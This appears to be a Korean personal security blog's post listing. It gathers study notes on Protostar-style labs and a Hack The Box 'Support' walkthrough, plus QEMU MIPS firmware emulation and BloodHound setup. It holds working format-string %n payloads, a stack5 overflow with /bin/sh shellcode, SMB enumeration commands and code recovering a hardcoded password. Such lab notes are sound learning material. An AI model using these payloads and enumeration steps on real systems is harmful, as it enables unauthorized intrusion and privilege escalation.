'분류 전체보기'에 해당되는 글 591건

https://blog.naver.com/seongjin0526/221330979343?trackingCode=rss

 (python -c 'print "AAAA"+".%8x"*12') | ./format3
(python -c 'print "\xf4\x96\x04\x08" + "%08x" * 10 + "%16930032x%n"') | ./format3

변경해야하는 값0x0102554는 10진수로 16930116 이다.
페이로드는 target 주소 + %08x * 10 + %16,930,032x%n
16930032는 target주소와 포맷 공백은 84를 빼준 값
앞에있는 84와 16930032가 더해져 16930116이 되어 16진수값 0x0102554가 target주소에 값이 들어간다.

https://liveyourit.tistory.com/83

참고

위 경로와 동일하게 
- 환경 : ubuntu-22.04-beta-desktop-amd64.iso
- 펌웨어 : 구버전 펌웨어
- 파일시스템 : MIPS

이미지 파일 다운로드 경로
https://people.debian.org/~aurel32/qemu/mips/
https://people.debian.org/~aurel32/qemu/mips/vmlinux-3.2.0-4-5kc-malta
https://people.debian.org/~aurel32/qemu/mips/debian_wheezy_mips_standard.qcow2

wget 명령어 사용해서
https://people.debian.org/~aurel32/qemu/mips/vmlinux-3.2.0-4-5kc-malta
https://people.debian.org/~aurel32/qemu/mips/debian_wheezy_mips_standard.qcow2

cd /usr/bin 경로로 이동 

qemu-system-mips64 -M malta -kernel vmlinux-3.2.0-4-5kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0"

명령어 입력 

공식문서 경로
https://bloodhound.readthedocs.io/en/latest/installation/windows.html

1. JDK 설치 및 환경변수 적용
2. neo4j 설치
: https://neo4j.com/deployment-center/#community

3. BloodHound 설치 
: https://github.com/SpecterOps/BloodHound-Legacy/releases

https://velog.io/@jjs9366/HTB-Support

https://0xmh.tistory.com/57

쥬스몬님, 0xMH님 블로그 참고 참고 

AD 환경에서 문제 풀이를 경험삼아 진행하고자 VIP (Month,  20달러) 로 결제 후 Pwnbox로 접근을 시도하였다.
오른쪽 상단 위에 Pwnbox 커넥션이 있으니 참고하여 고고~ 
(문제 난이도 Easy)

문제 진행중에 당황한 부분이 있는데, 노트북 성능이 떨어질 경우 굉장히 느리다는 점이다.
(무조건 성능 좋은 PC나 노트북으로 진행 하십시오.) (그래야 정신 건강에 좋음)

Domain Controller로 보이는 환경 (Port Scan)
nmap -sC -sV -Pn 10.129.160.19(점검 대상)

dig any support.htb 10.129.160.19
support.htb, dc.support.htb 확인

SMB 익명 로그인 가능
crackmapexec smb 10.129.160.19

SMB 공유 디렉토리 목록 (익명 로그인 옵션 -N) 
smbclient -L \\\\10.129.160.19\\
support-tools 확인 

smbclient \\\\10.129.160.19\\support-tools
dir 명령어 

.Net Assemly 32bit PE 확인

로컬 환경으로 해당 파일 옮겨서 ExeInfo 정보 확인

Dnspy 사용 시 아래 내용 확인 가능(UserInfo.exe)

아래 소스는 쥬스몬님 블로그 내 GO Lang 참고 참고 

package main

import (
	"encoding/base64"
	"fmt"
)

type Protected struct{}

func (p *Protected) getPassword() string {
	encPassword := "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
	key := []byte("armando")

	decoded, _ := base64.StdEncoding.DecodeString(encPassword)
	decrypted := make([]byte, len(decoded))

	for i := 0; i < len(decoded); i++ {
		decrypted[i] = decoded[i] ^ key[i%len(key)] ^ 223
	}

	return string(decrypted)
}

func main() {
	p := Protected{}
	password := p.getPassword()
	fmt.Println(password)
}

python Code verison

import base64
from itertools import cycle

enc_password = base64.b64decode("0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E")
key = b"armando"
key2 = 223

res = ''
for e,k in zip(enc_password, cycle(key)):
    res += chr(e ^ k ^ key2)

print(res)

이제 슬슬 뭔가 잘 안되기 시작하네.. 이젠 익숙하구만

일단 퀵하게 root passwd 변경

sudo passwd root
새로운 패스워드 변경
패스워드 확인 입력(동일)
su root 
변경된 패스워드 입력

root 권한 접근 후 아래 내용 참고하여 정상적으로 실행이 불가한 파일부터 하나씩 설치

# 칼리 리눅스 
apt update -y 
apt install bloodhound -y 
neo4j console 

# http://localhost:7474 방문 후 neo4j:neo4j 를 이용해 로그인. 
# 이후, 비밀번호를 바꿔줌.

# 블러드하운드 실행 후 neo4j:<바뀐-비밀번호>로 로그인 
bloodhound

https://m.blog.naver.com/seongjin0526/221330963759

(python -c 'print "\x90" * 4 + "\xe4\x96\x04\x08" + "%08x%08x%08x%32c%n"';cat) | ./format2
(python -c 'print "\xe4\x96\x04\x08"+"%20x"*3+"%n"') | ./format2

%x로 스택 공간을 4byte 씩 이동해서 %n으로 넣는 것이다.

https://www.orientdisplay.com/ko/emulating-embedded-linux-systems-with-qemu/

https://www.igloo.co.kr/security-information/linux-kernel-%EB%82%B4-use-after-free-%EC%B7%A8%EC%95%BD%EC%A0%90cve-2024-1086-%EB%B6%84%EC%84%9D-%EB%B0%8F-%EB%8C%80%EC%9D%91%EB%B0%A9%EC%95%88/

https://velog.io/@wonder_land/Pwnable-15.-Memory-Corruption-Use-After-Free

https://keyme2003.tistory.com/entry/Use-After-Free-UAF

https://seclab614.tistory.com/3

https://blog.naver.com/seongjin0526/221330918874

위 블로그 내 나온데로 바이트 길이 조절이 필요함 
환경마다 미세하게 길이 값을 다르게 요청해야 정상적으로 결과 값이 print 되는 것 같음

./format1 `python -c 'print "\x38\x96\x04\x08AAAAAA%130$n"'`
./format1 `python -c 'print "\x38\x96\x04\x08AAAA"+"%8x"*127+"%8n"'`

Format String기능

https://hasol.co/download/firmwares/

https://toubva.github.io/blog/fuzzing/2025-01-27-CVE-2024-28283#/

https://kiffblog.tistory.com/251

참고

https://github.com/pr0v3rbs/FirmAE
https://github.com/ucsb-seclab/karonte

리마인드

다양한 방법을 시도하였으며, 결국 core dump 파일에 있는 0xbffffc40 주소로 ret 값 입력 시 정상적으로 쉘이 떨어진다. 

https://jennana.tistory.com/579

core 덤프 확인을 위해 아래와 같이 설정 

$ cat /proc/sys/kernel/core_pattern
/tmp/core.%s.%e.%p
# cat /proc/sys/fs/suid_dumpable
0
# echo "1" > /proc/sys/fs/suid_dumpable
# cat /proc/sys/fs/suid_dumpable
1
$ ulimit -c unlimited

최종 삽입코드 : NOP(16) + 쉘코드(24) + NOP(36) + RET(4) = 80 

(python -c 'print "\x90"*16+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*36+"\x40\xfc\xff\xbf"';cat) | ./stack5

추가 참고)

https://noobfrompitt.github.io/protostar-stack5/